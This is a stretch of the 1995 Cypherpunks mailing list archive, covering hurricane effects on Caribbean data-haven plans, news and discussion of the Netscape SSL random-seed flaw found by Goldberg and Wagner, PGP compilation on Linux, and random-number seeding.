symptomatic of deeper weather pattern changes.) ObCypherpunks Relevance: A couple of past or current list members have nascent Internet plans in some of these islands. (I think one of them is way south, just off Venezuela.) I suspect "Caribbean Data Havens" and "Internet Sites" are further off than they were a few months ago. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From ravage at einstein.ssz.com Mon Sep 18 17:49:58 1995 From: ravage at einstein.ssz.com (Jim Choate) Date: Mon, 18 Sep 95 17:49:58 PDT Subject: Caribbean Internet Services? (fwd) Message-ID: <199509190100.UAA00247@einstein.ssz.com> Forwarded message: > To: cypherpunks at toad.com > From: tcmay at got.net (Timothy C. May) > Subject: Caribbean Internet Services? > > A brief note, though the hardship to the Caribbean islands will not be brief. > St. Thomas, St. Croix, and other islands were hit extremely hard by > hurricane Marilyn. Previous hurricanes, including Luis, also hit some of > the islands. > > ObCypherpunks Relevance: A couple of past or current list members have > nascent Internet plans in some of these islands. (I think one of them is > way south, just off Venezuela.) > > I suspect "Caribbean Data Havens" and "Internet Sites" are further off than > they were a few months ago. > Satellite dishes and a steady supply of gasoline via a couple of tankers would make such an operation completely portable. A more ideal solution would be to moore a ship in international waters (wasn't some group wanting to do this for 'humanitarian' reasons or somesuch?). Jim Choate From perry at piermont.com Mon Sep 18 17:51:27 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 18 Sep 95 17:51:27 PDT Subject: Caribbean Internet Services? In-Reply-To: Message-ID: <199509190051.UAA01037@frankenstein.piermont.com> Timothy C. May writes: > Power in St. Thomas may not be back for a year in some parts. The roads, > sewers, power lines, phone system, etc. will likely have to be completely > rebuilt. [...] > I suspect "Caribbean Data Havens" and "Internet Sites" are further off than > they were a few months ago. Not really. I suspect that phone company co-location and using buried lines and your own generator would probably fix most problems if you were "serious" about doing such a thing. Perry From cman at communities.com Mon Sep 18 17:59:21 1995 From: cman at communities.com (Douglas Barnes) Date: Mon, 18 Sep 95 17:59:21 PDT Subject: Caribbean Internet Services? Message-ID: Actually, it just highlights the need to make sure one is relying on buried/underwater cables, as well as the importance of hurricane resistant architecture. Virtually all of the buildings destroyed would have been obviously unsuitable for locating important servers even before this recent reminder. Note that this is not an endorsement or a condemnation of "Libertaria in Cyberspace" or in any particular physical location. >I suspect "Caribbean Data Havens" and "Internet Sites" are further off than >they were a few months ago. > >--Tim May > >---------:---------:---------:---------:---------:---------:---------:---- >Timothy C. May | Crypto Anarchy: encryption, digital money, >tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero >Corralitos, CA | knowledge, reputations, information markets, >Higher Power: 2^756839 | black markets, collapse of governments. >"National borders are just speed bumps on the information superhighway." From jya at pipeline.com Mon Sep 18 18:10:08 1995 From: jya at pipeline.com (John Young) Date: Mon, 18 Sep 95 18:10:08 PDT Subject: NYT on Netscape SSL Crack Message-ID: <199509190110.VAA20649@pipe4.nyc.pipeline.com> WQXR, the New York Times radio station, just reported on the crack, citing Markoff's article tomorrow. Says Netscape plans a fix, perhaps as early as tomorrow. We'll get a late-night copy and post it. From rah at shipwright.com Mon Sep 18 18:11:11 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 18 Sep 95 18:11:11 PDT Subject: Vince Cate is Breathing ;-) Message-ID: I think I can be foregiven for sharing a little private mail interchange I just had with Vince Cate, the Anguillan ex-cypherpunk/technomad, who's digging out from under Hurricane Luis... Cheers, Bob Hettinga --- begin forwarded text Date: Mon, 18 Sep 1995 13:47:36 +24000 From: Vincent Cate Subject: Re: How are you doing? To: Robert Hettinga MIME-Version: 1.0 > I figure by now the phone lines might be up, though I had heard there was > only one line up on Anguilla the day after. > > Can we do anything here to help? I am not sure if my other mail made it. Ya, the roof blew off of the phone company and also the electric company. All the phone company could do was set up an inmarsat phone line and charge $60/min to make calls. Thanks. I can't think of anything I need. Unless you know who sells directional cell phone antennas. Thanks! -- Vince --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From sameer at c2.org Mon Sep 18 18:11:50 1995 From: sameer at c2.org (sameer) Date: Mon, 18 Sep 95 18:11:50 PDT Subject: Hack Netscape! Message-ID: <199509190106.SAA02447@infinity.c2.org> The T-shirt isn't designed yet but I think the web page can take public consumption now. Check out http://www.c2.org/hacknetscape -- sameer Voice: 510-601-9777 Network Administrator FAX: 510-601-9734 Community ConneXion: The NEXUS-Berkeley Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From tedwards at Glue.umd.edu Mon Sep 18 19:10:21 1995 From: tedwards at Glue.umd.edu (Thomas Grant Edwards) Date: Mon, 18 Sep 95 19:10:21 PDT Subject: Hack Netscape! In-Reply-To: <199509190106.SAA02447@infinity.c2.org> Message-ID: On Mon, 18 Sep 1995, sameer wrote: > The T-shirt isn't designed yet but I think the web page can > take public consumption now. Check out http://www.c2.org/hacknetscape Heh, what about a shirt for the people who worked through keyspace for the second crack? ;) -Thomas From bret at bjohns.win.net Mon Sep 18 19:15:20 1995 From: bret at bjohns.win.net (Bret A. Johnson) Date: Mon, 18 Sep 95 19:15:20 PDT Subject: PGP for Linux 1.2.8 Message-ID: <1818@bjohns.win.net> Can anyone tell me where a version of PGP 2.62 can be found for Linux? I got one off of ftp.berkeley.edu (pgp262s.zip) and it (or I can not get it) to compile on my system.. Thanks... From sameer at c2.org Mon Sep 18 19:16:06 1995 From: sameer at c2.org (sameer) Date: Mon, 18 Sep 95 19:16:06 PDT Subject: COMMUNITY CONNEXION OFFERS REWARD FOR EXPOSING ENCRYPTION FLAWS Message-ID: <199509190211.TAA07099@infinity.c2.org> For Immediate Release Contact: sameer at c2.org 510-601-9777 COMMUNITY CONNEXION OFFERS REWARD FOR EXPOSING ENCRYPTION FLAWS Sept 19 1995 - Community ConneXion, a privacy server and ISP in Berkeley, California, today announced that it will be offering an incentive to the net to expose security flaws in some software that is advertised on the net as secure. This weekend a member of the cypherpunks community, Ian Goldberg, and his officemate, David Wagner, revealed a method which would allow someone to break the encryption used by Netscape Navigator in 25 seconds. Netscape Communications Corporation has been advertising their products as a "secure" way of communicating sensitive information over the net. People have been using this Netscape software to send their credit card numbers over the net, communicate with their brokers, and other tasks requiring security. "Netscape was apparently relying on security by obscurity in this case," said Community ConneXion's founder, Sameer Parekh. In light of this recent break and the earlier two brute force attacks on the encryption used in the international version of Netscape Navigator (crippled because of restrictions on the export of cryptography from the United States) Community ConneXion has offered a challenge to the net community to find more holes. Ian, David, and the people responsible for the brute-force attacks will be receiving free limited-edition T-shirts for their work. "The more holes people find, the more holes will get fixed. Netscape makes the most widely used commercial WWW software out there, so it is in the net's best interest for netscape to have good security. By exposing the holes in netscape, we will hopefully get them fixed," said Sameer. Details about the HackNetscape promotion are available from http://www.c2.org/hacknetscape, or by sending mail to hacknetscape at c2.org. Community ConneXion is the premier internet privacy ISP. They offer anonymous accounts, remailers, and psuedonym servers, in addition to the standard ISP fare of webspace and dialup IP access. Information is available from http://www.c2.org or mailing info at c2.org. Netscape and Netscape Navigator are trademarks of Netscape Communications Corporation. This promotion is not affiliated with NCC. From carolann at censored.org Mon Sep 18 19:16:52 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Mon, 18 Sep 95 19:16:52 PDT Subject: John Young You are KEWL! Message-ID: <199509190216.TAA05926@usr2.primenet.com> It is really nice what you're doing here. It is appreciated. Love Always, Carol Anne -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From tcmay at got.net Mon Sep 18 19:22:18 1995 From: tcmay at got.net (Timothy C. May) Date: Mon, 18 Sep 95 19:22:18 PDT Subject: Caribbean Internet Services? (fwd) Message-ID: At 1:00 AM 9/19/95, Jim Choate wrote: >> ObCypherpunks Relevance: A couple of past or current list members have >> nascent Internet plans in some of these islands. (I think one of them is >> way south, just off Venezuela.) >> >> I suspect "Caribbean Data Havens" and "Internet Sites" are further off than >> they were a few months ago. >> > >Satellite dishes and a steady supply of gasoline via a couple of tankers >would make such an operation completely portable. A more ideal solution >would be to moore a ship in international waters (wasn't some group wanting >to do this for 'humanitarian' reasons or somesuch?). Sure, there are possible fixes to the various problems. I'm not saying the Caribbean will shut down, only that this will likely increase operating costs, in at least some of the areas, and will frighten off some investors. Human nature. The model need not be physical sites in these locales, of course. But even maintaining a business office in some of these locales will be a hassle. (This is where I expect the usual folks will jump in and shout "On the contrary!" Note however, how few of them actually live in St. Barts, or Anguilla, or Curacao, or the Bahamas.) --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From sameer at c2.org Mon Sep 18 19:23:37 1995 From: sameer at c2.org (sameer) Date: Mon, 18 Sep 95 19:23:37 PDT Subject: Hack Netscape! In-Reply-To: Message-ID: <199509190217.TAA07775@infinity.c2.org> Community ConneXion doesn't have the budget to give a free T-shirt to everyone who helped. ;-) You can buy one of the general release t-shirts we'll be making though. > > On Mon, 18 Sep 1995, sameer wrote: > > > The T-shirt isn't designed yet but I think the web page can > > take public consumption now. Check out http://www.c2.org/hacknetscape > > Heh, what about a shirt for the people who worked through keyspace for > the second crack? ;) > > -Thomas > -- sameer Voice: 510-601-9777 Network Administrator FAX: 510-601-9734 Community ConneXion: The NEXUS-Berkeley Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From warlord at MIT.EDU Mon Sep 18 19:25:07 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Mon, 18 Sep 95 19:25:07 PDT Subject: PGP for Linux 1.2.8 In-Reply-To: <1818@bjohns.win.net> Message-ID: <199509190224.WAA03110@toxicwaste.media.mit.edu> Hi. PGP 2.6.2 compiles out-of-the-box on Linux. In fact, Linux is my personal development platform at home, so I make sure that it works. Just "make" in rsaref/install/unix, and then "make linux" in src. If you are in the US or Canada, you can get PGP 2.6.2 from MIT. Here are the instructions: The file ftp://net-dist.mit.edu/pub/PGP/README contains instructions on how to download PGP 2.6.2. Included therein are Binaries for DOS and Mac, and the sources for DOS, Unix and Mac. To read these files you should log in with username anonymous and use your email address as the password. Alternatively, you can use the WWW interface to get to these packages. Just connect to the PGP-form web page and follow the instructions: http://bs.mit.edu:8001/pgp-form.html -derek From yihchun at u.washington.edu Mon Sep 18 19:45:22 1995 From: yihchun at u.washington.edu (Yih-Chun Hu) Date: Mon, 18 Sep 95 19:45:22 PDT Subject: PGP for Linux 1.2.8 In-Reply-To: <1818@bjohns.win.net> Message-ID: On Mon, 18 Sep 1995, Bret A. Johnson wrote: > Can anyone tell me where a version of PGP 2.62 can be found for Linux? > I got one off of ftp.berkeley.edu (pgp262s.zip) and it (or I can not > get it) to compile on my system.. It compiled on mine just fine. Be sure you have an up to date bintools and gcc. 1. Make sure you are using 2.5.2/2.6.3. Thats how I compiled mine. 2. Unzip the source in /usr/src/pgp (or whereever) 3. cd /usr/src/pgp/rsaref/install/unix 4. make 5. cd /usr/src/pgp/src 6. make linux And you should have a pgp binary. 7. cp /usr/src/pgp/src/pgp /usr/local/bin/pgp Though they might differ, the MD5 hash of my Linux version is f7dd657c0c5ed8a5cb7c5dfcf5af6c5b. Good luck! +---- Yih-Chun Hu (finger:yihchun at cs.washington.edu) ----------------------+ | http://www.cs.washington.edu/homes/yihchun yihchun at cs.washington.edu | | http://weber.u.washington.edu/~yihchun yihchun at u.washington.edu | +---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+ | 1024/E50EC641 B2 A0 DE 9E 36 C0 EB A6 F9 3E D2 DD 2F 27 74 79 | | 2047/DF0403F9 18 EB 62 C8 7F 06 04 67 42 76 24 E2 99 D1 07 DC | +---- Random Thought ------------------------------------------------------+ |I conducted an experiment to test Murphy's Law, but everything went wrong.| +--------------------------------------------------------------------------+ From rah at shipwright.com Mon Sep 18 20:15:33 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 18 Sep 95 20:15:33 PDT Subject: Hurricane Luis in Anguilla / Cellphone Antenna Message-ID: --- begin forwarded text Date: Mon, 18 Sep 1995 13:24:33 +24000 From: Vincent Cate Subject: Hurricane Luis in Anguilla / Cellphone Antenna To: Steve Roberts cc: Technomads MIME-Version: 1.0 Hurricane Luis took Anguilla apart. The three utility polls right near my house all blew down. My house, computers, etc are all fine. Nobody was killed in Anguilla, but in St Marten (5 miles away) it seems there were many people killed. They have a lot of poor people there and also a lot of people used to live in boats. More than 1,000 of about 1,400 boats sank. They eye went right over Anguilla. For awhile it was calm enough that everyone went outside to stretch and say hi to everyone. Overall it took about 4 days to pass. It has been nice to have solar pannels, batteries, an interter, etc. I did not have a cellphone, but I do now. And now that I have one I am really interested in the directional antenna that might let me reach other islands - in particular the US Virgin islands where long distance rates are $0.10/min at night with sprint instead of the $2/min that we pay here in Anguilla. Does anyone know where I can order a directional cellphone antenna (boat antenna) good for 100 miles? -- Vince --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From jya at pipeline.com Mon Sep 18 20:35:19 1995 From: jya at pipeline.com (John Young) Date: Mon, 18 Sep 95 20:35:19 PDT Subject: NYT on Netscape Crack Message-ID: <199509190300.XAA05027@pipe4.nyc.pipeline.com> The New York Times, September 19, 1995, pp. A1, D21. Security Flaw Is Discovered In Software Used in Shopping By John Markoff San Francisco, Sept. 18 -- A serious security flaw has been discovered in Netscape, the most popular software used for computer transactions over the Internet's World Wide Web, threatening to cast a chill over the emerging market for electronic commerce. The flaw, which could enable a knowledgeable criminal to use a computer to break Netscape's security coding system in less than a minute, means that no one using the software can be certain of protecting credit card information, bank account numbers or other types of information that Netscape is supposed to keep private during on-line transactions. The weakness was identified by two first-year graduate students in computer science at the University of California at Berkeley, who published their findings on an Internet mailing list Sunday evening. Although the Netscape Communications Corporation, which produces the software, said today that the flaw could be fixed and that new copies of the software would be distributed as early as next week, Internet experts said the discovery underscored the danger of assuming that any computer security system was safe. "There needs to be much more public auditability in the way these financial security systems are designed and implemented," said Eric Hughes, president of Open Financial Networks, a company in Berkeley that is developing Internet commerce systems. The Netscape software is already used by an estimated eight million people for navigating the World Wide Web portion of the Internet. On the Web, thousands of companies offer text, images, video and audio information, much of it as a way of advertising or directly selling goods and services. Because the Netscape software is not only easy to use but has also been promoted as a secure way of dealing with personal and financial information, it has been seen as the emerging de facto standard for on-line commerce. Already, a diverse group of companies -- including Wells Fargo Bank, MCI Communications, Internet Shopping Network and Virtual Vineyards -- have adopted Netscape as the vehicle for checking bank balances, catalogue shopping or buying wine on line. Although Internet experts agreed with the company's assessment that the flaw could be fixed and that it posed no risk to people who use the World Wide Web only to retrieve nonsensitive data, the security problem's disclosure may represent a public relations setback for Netscape Communications and an inconvenience to millions of people who may feel a need to replace the version of Netscape installed on their computers. Last month the company's shares began public trading and had one of the most successful first days in Wall Street's history, largely on the resounding popularity of the Netscape software. Today, as word of the security flaw circulated only within fairly small circles of Internet users, Netscape's stock closed with a slight loss, down 75 cents, to $52.50, in low Nasdaq trading volume. The company said it would release a repaired version of the software within a week. Users will be able to download it free over the Internet, through the Netscape site on the World Wide Web (http://home.netscape.com). The company had previously announced a next-generation version of Netscape that it said would be more secure than the original, and it said today that it would release this updated version within the next few weeks. But first it will remove the newly disclosed flaw, which is currently in the new version. "The good news and the bad news of the Internet is that when you put something up there, many more people can test it," said Mike Homer, the vice president of marketing at Netscape. "You also give yourself the opportunity of having people point things out which you can fix quickly." The company so far has distributed most copies of its program free over the Internet, under a strategy of making its money from commercial customers who use Netscape to provide services or for other business applications over the World Wide Web. So replacing the copies will not be an expensive undertaking. Instead, for Netscape Communications and for other companies betting their futures on the Internet, the real cost of this disclosure may be in the public's shaken confidence in the ability of computer companies to insure privacy and security for on-line commerce. The weakness in Netscape's security was discovered by Ian Goldberg, 22, and David Wagner, 21, two computer science students who share an office at the university and who also share an interest in the arcane science of cryptography, which is becoming increasingly important for business as companies begin to explore electronic commerce. The two students said they had decided to put the software to a test in an effort to raise public concern about placing too much trust in unproved electronic security systems. Netscape's security is based on a type of coding technology known generically as public key cryptography in which users exchange mathematically generated numbers -- or keys -- to encode or decode information. In such systems, a new key is created for each information exchange, based on a mathematical formula that is combined with numbers supposedly known only to the sender or recipient. The students found that by determining how Netscape's formula generated the number used as a starting point for creating a key, they were able to greatly reduce the potential combinations that would unlock the code. The starting-point number turned out to be based on the time and date of the transaction, combined with several other unique bits of information taken from a user's computer system -- bits of information that an electronic intruder could determine, if he were intent on intercepting a Netscape user's transactions. Knowing how the starting-point number was created greatly reduced the other possible components of the formula -- and the students found they were able to break the code in a matter of seconds using a standard computer work station. Netscape officials said today that they would strengthen the system, by making it significantly harder to determine the random number at the heart of their coding system. They said they would no longer disclose what data would be used to generate the random numbers. The announcement of the flaw was posted Sunday night on a computer network mailing list maintained by an informal group known as Cypherpunks. The group, which is made up of mathematicians, computer experts and privacy advocates, has been campaigning for more effective electronic security systems. The discovery is the second reported security weakness in the Netscape program to be posted on the Cypherpunks list in the last month. In August, Damien Doligez, a student at the Ecole Polytechnique in Paris, used a network of 120 computers, running for eight days, to generate a Netscape secret key. But his was a "brute force" attack, requiring the computers to sample a vast range of numbers before coming up with a key that would break the code. The Berkeley students, in contrast, by identifying a basic flaw in the way Netscape set up its security system, were able to narrowly focus their attack to quickly break the code, with far less computer power. [End] From don at cs.byu.edu Mon Sep 18 20:50:14 1995 From: don at cs.byu.edu (don at cs.byu.edu) Date: Mon, 18 Sep 95 20:50:14 PDT Subject: Musings Message-ID: <199509190256.UAA00267@wero.byu.edu> -----BEGIN PGP SIGNED MESSAGE----- I noticed Sameer's release had some nice shots at ITAR. Heh. When aiming for outsiders, it might be productive to explain what cpunks do in a I'm- ok-you're-ok sorta way. For example, "the cryptographic research group 'cypherpunks'..." ObHackNetscape: I was thinking last night about the process of verifying that someone had swept the keyspace that they claimed to have swept. (Umm, well, so much for Mozilla, but ya know, next time...) and I wanted to run this idea past Those Who Know[tm]: When doling out a segment of 16M keys, attach results of two randomly chosen garbage decryptions. The bruter has to report back which two keys they are. The overhead would add up, but I don't think it would be significant. Or if a stronger method is needed, provide the MD5 hash of the garbage decryptions. Maybe with a discriminator or something, so you only MD5 a few thousand. Anyway, the idea is that if you have to prove that you swept a big enough chunk to find the two keys, you've proven that you've swept a great portion of the keyspace. Of course, this does nothing to prevent _withholding_ a result. But it does prove that most of the keyspace has been swept; and most likely the search continued even after the two keys are found. This would make it much more possible to give consolation prizes without worrying about false NAKs of big segments. If anyone is still interested in that idea. ObFactoring: Picked up the Quadratic Sieve factoring program from Mathworks. Haven't had a chance to compile it yet, but Bob Silverman told me in email he was willing to make it available to a group such as [The Cryptographic Research Foundation] Cyperpunks. ObHamilton '95: Pulled up my tomorrow's stock pages. Netscape takes a big hit, but not big enough for a foolish thing like that. I hope none of my banks go around setting their safe combinations to 1234 or anything... ;| Don -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBMF4xO8La+QKZS485AQFQtQL/f9bmpnGT/3FfB2rqnFmMltJEkgY8/Oym Vtkzm6xrlApY7b9b2UhVvPXurHU8DBAZeqj5Yu7VvLsQ+w3YelGEAYfzdhECk2t/ 5NRYi0RkgFkIs+XCuDGVkoSXExT++KsZ =V54e -----END PGP SIGNATURE----- fRee cRyPTo! jOin the hUnt or BE tHe PrEY PGP key - http://bert.cs.byu.edu/~don or PubKey servers (0x994b8f39) June 7&14, 1995: 1st amendment repealed. Death threats ALWAYS pgp signed * This user insured by the Smith, Wesson, & Zimmermann insurance company * From perry at piermont.com Mon Sep 18 20:55:59 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 18 Sep 95 20:55:59 PDT Subject: NYT on Netscape Crack In-Reply-To: <199509190300.XAA05027@pipe4.nyc.pipeline.com> Message-ID: <199509190355.XAA01329@frankenstein.piermont.com> Markoff's article in the Times says: > Netscape officials said today that they would strengthen > the system, by making it significantly harder to determine > the random number at the heart of their coding system. They > said they would no longer disclose what data would be used > to generate the random numbers. Not, of course, that they disclosed it before -- it was found by reverse engineering the distributed executable. Not, of course, that they have a choice in the matter of whether to disclose it -- they will be "disclosing" how its done as soon as they release the code. Not, of course, that security through obscurity does any good -- it just magnifies the pain. I suspect that there are far more flaws in Netscape. String buffer overflows are another good guess here -- they are probably rampant through the code both for the browser and the commerce server they sell. I can't prove it myself, of course, given that I don't have the time to rip the thing apart, but the same folks never seemed to learn their lesson in release after release when they worked at NCSA, and the only thing thats probably keeping their dignity here is the lack of distributed source code. I'll pay for the "I broke Netscape's Security" T-Shirt for the enterprising person that takes the time to find them in the object code. (See Sameer's page on the shirts he's developing as prizes for the Netscape flaw finders.) Two "I broke Netscape's Security" T-Shirts to that daring soul at Netscape who finds the next flaw and has the balls to mention it in public instead of sweeping it under the carpet -- even if the person is Marc Andreessen. Perry From kinney at bogart.Colorado.EDU Mon Sep 18 20:57:24 1995 From: kinney at bogart.Colorado.EDU (W. Kinney) Date: Mon, 18 Sep 95 20:57:24 PDT Subject: Good random seeds In-Reply-To: <199509182042.QAA02146@homeport.org> Message-ID: <199509190357.VAA22661@bogart.Colorado.EDU> Adam Shostack writes: > Since we can all see how badly time works, I'd like to point out > that Will Price, author of the excellent Cryptdisk utility for the Mac, > uses mouse movements to seed his PRNG. > > His code is available for a small fee, and I'd strongly suggest > that people who need good, easy PRNs take a look at it, and also take a Just to clear up a point of attribution, the core random number generator used by CryptDisk was designed and written by Colin Plumb, with a wrapper for the Macintosh written by me. Will (Price) told me that he has made some improvements to my original implementation for the latest version of CryptDisk, doing the clock timings more simply. My code and Colin's are free, and I'd be happy to post the routines if there is interest. -- Will From adam at homeport.org Mon Sep 18 21:04:57 1995 From: adam at homeport.org (Adam Shostack) Date: Mon, 18 Sep 95 21:04:57 PDT Subject: Brute Force and Smart Force Message-ID: <199509190405.AAA03711@homeport.org> I think its worth pointing out that instead of taking (arguably) $10,000 worth of computer time to brute force SSL, Goldberg-Wagner's attack exploits a weakness in the system to spend maybe a few dollars to crack it. Clever attacks on cryptosystems like this are the bread and butter of 'practical' cryptanalysis. It might take until slightly after the heat death of the universe to break IDEA or your 2048 bit RSA key, but there exist other attacks, and they are the ones which will be exploited. (Also, as Robert Morris pointed otut, never underestimate the time, money or effort your opponent will put into cryptanalysis. Cypherpunks, collectively, have put a great deal of time, effort, and CPU into proving SSL bogus, and I don't think anyone here made any money doing it.) Perhaps we should refocus our efforts on attacking PGP, to see if there are holes there? (I'm not suggesting there are, but it would be nice to see some code written to extend Crack to phrases, do some more code review, etc.) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From bdolan at use.usit.net Mon Sep 18 21:08:22 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Mon, 18 Sep 95 21:08:22 PDT Subject: Hurricane Luis in Anguilla / Cellphone Antenna In-Reply-To: Message-ID: Assuming your cellphone operates in the 800 MHz range, transmitting with about 1 W., I think you're out of luck. With UHF and particularly at low power levels, you just about have to be line-of-sight to the receiving antenna. Guessing how high up your antenna might be and how high the receiving antenna could be, I would say you would be lucky to achieve a range of 20 miles. I'd be astonished at anything over 50. Brad On Mon, 18 Sep 1995, Robert Hettinga wrote: > > --- begin forwarded text > > Date: Mon, 18 Sep 1995 13:24:33 +24000 > From: Vincent Cate > Subject: Hurricane Luis in Anguilla / Cellphone Antenna > To: Steve Roberts > cc: Technomads > MIME-Version: 1.0 > > > > Hurricane Luis took Anguilla apart. The three utility polls right near my > house all blew down. My house, computers, etc are all fine. > > Nobody was killed in Anguilla, but in St Marten (5 miles away) it seems > there were many people killed. They have a lot of poor people there > and also a lot of people used to live in boats. More than 1,000 of > about 1,400 boats sank. > > They eye went right over Anguilla. For awhile it was calm enough that > everyone went outside to stretch and say hi to everyone. Overall it > took about 4 days to pass. > > It has been nice to have solar pannels, batteries, an interter, etc. I did > not have a cellphone, but I do now. > > And now that I have one I am really interested in the directional antenna > that might let me reach other islands - in particular the US Virgin > islands where long distance rates are $0.10/min at night with sprint > instead of the $2/min that we pay here in Anguilla. Does anyone know > where I can order a directional cellphone antenna (boat antenna) good for > 100 miles? > > -- Vince > --- end forwarded text > > > ----------------- > Robert Hettinga (rah at shipwright.com) > Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 > USA (617) 323-7923 > "Reality is not optional." --Thomas Sowell > >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< > > > From jlasser at rwd.goucher.edu Mon Sep 18 21:11:00 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Mon, 18 Sep 95 21:11:00 PDT Subject: PGP for Linux 1.2.8 In-Reply-To: <199509190224.WAA03110@toxicwaste.media.mit.edu> Message-ID: On Mon, 18 Sep 1995, Derek Atkins wrote: > Hi. PGP 2.6.2 compiles out-of-the-box on Linux. In fact, Linux is my > personal development platform at home, so I make sure that it works. > Just "make" in rsaref/install/unix, and then "make linux" in src. Heh. It's not QUITE so simple. :) If you're running an ELF system, you have to pretend it's a sys v system (or, alternatively, remove all the leading underscores in the .globl names in the assembly language (*.S) files. Also, you should upgrade to the latest 1.2.x version of linux, as there was a fairly large memory leak until 1.2.11 or 1.2.12 or so... OBCrypto: UNIX confuses me :) Jon ------------------------------------------------------------------------------ Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From unicorn at polaris.mindport.net Mon Sep 18 21:15:19 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Mon, 18 Sep 95 21:15:19 PDT Subject: NYT on Netscape Crack In-Reply-To: <199509190300.XAA05027@pipe4.nyc.pipeline.com> Message-ID: On Mon, 18 Sep 1995, John Young wrote: > The New York Times, September 19, 1995, pp. A1, D21. > > > Security Flaw Is Discovered In Software Used in Shopping > > By John Markoff > > Today, as word of the security flaw circulated only within > fairly small circles of Internet users, Netscape's stock > closed with a slight loss, down 75 cents, to $52.50, in low > Nasdaq trading volume. Gotta like that open sell order. :) --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From Chris.Claborne at SanDiegoCA.ATTGIS.COM Mon Sep 18 21:17:59 1995 From: Chris.Claborne at SanDiegoCA.ATTGIS.COM (Chris Claborne) Date: Mon, 18 Sep 95 21:17:59 PDT Subject: Bidzos takes advantage of Netscape hole! Message-ID: <9509190017.aa08714@ncrhub1.ATTGIS.COM> The following article has a quote from Bidzos claiming that they offered to review the code but that Netscape declined. Of course the good student is going to have them review it... How about having the Goldberg and Wagner review it for some bucks!!! 2 -- C -- ---------------------------------------------------------- Netscape's Internet Software Contains Flaw That Jeopardizes Security of Data By JARED SANDBERG Staff Reporter of The Wall Street Journal A serious security flaw has been found in Netscape Communications Corp.'s Internet software, jeopardizing sensitive financial data such as credit-card numbers that users pass over the global computer network. The company acknowledged the flaw and said it's issuing a software fix. But as is often the case with Internet security, it may take time for users to adopt the fix, leaving them vulnerable meanwhile. "It's a very big trapdoor," said Dietrich Kappe, a partner with Red Planet L.L.C., an Chicago Internet consulting firm. "You can drive a truck through it. Somebody goofed" at Netscape, he added. The breach presents a problem for Netscape, which produces the most popular software for browsing the World Wide Web, the multimedia portion of the Internet where businesses are setting up electronic storefronts to sell goods and services. Netscape has captured roughly 75% of the "browser" market, reaching roughly eight million people, who use the Netscape product to browse the Web and make credit-card purchases. The breach also underscores the persistent security problems that have plagued the Internet and forestalled electronic commerce. Netscape uses so-called symmetric key cryptography to scramble sensitive data so that they are unreadable by hackers snooping on the network. That key is essentially a mathematical formula so long that it makes it impractical for hackers to crack, even with powerful computers. The formula is generated by a random number that may be determined by the number of electronic-mail messages, for example. Netscape's software chooses a number between one and two-to-the-30th-power -- or roughly one billion. But on Sunday night, two graduate students at the University of California at Berkeley posted a message to the Internet's "Cypherpunks" mailing list, a group of mathematicians and programmers who discuss the science of cryptography. In the electronic missive, they said that the random number that generates the mathematical key was "fairly trivial to guess" and that the key "usually takes less than one minute to find." Rather than try to break the encryption "key," the two graduate students examined the so-called "random number generator" and discovered that the number isn't so random, allowing them to guess the encryption key. It took the two students, Ian Goldberg and David Wagner, two days to identify the vulnerability and write a software program that could guess the encryption key in less than one minute. Netscape's software, said Mr. Goldberg, 22 years old, "is not as good as people thought, which is probably worse than no security" since people have a false sense of security as they enter payment details. "The information we were using to create the key is now a known set of information," said Jeffrey Treuhaft, security product manager for Netscape. "We feel it's important to let our consumers know," he said, adding that the company will post a warning on its own Web site. "It's a serious hole, but it can easily be corrected," said James Bidzos, president of RSA Data Security Inc., which licenses security technology that Netscape incorporates in its system. Netscape said it plans to have a software fix to resolve the problem available for downloading over the Internet by the end of this week. RSA's Mr. Bidzos said his company offered to review 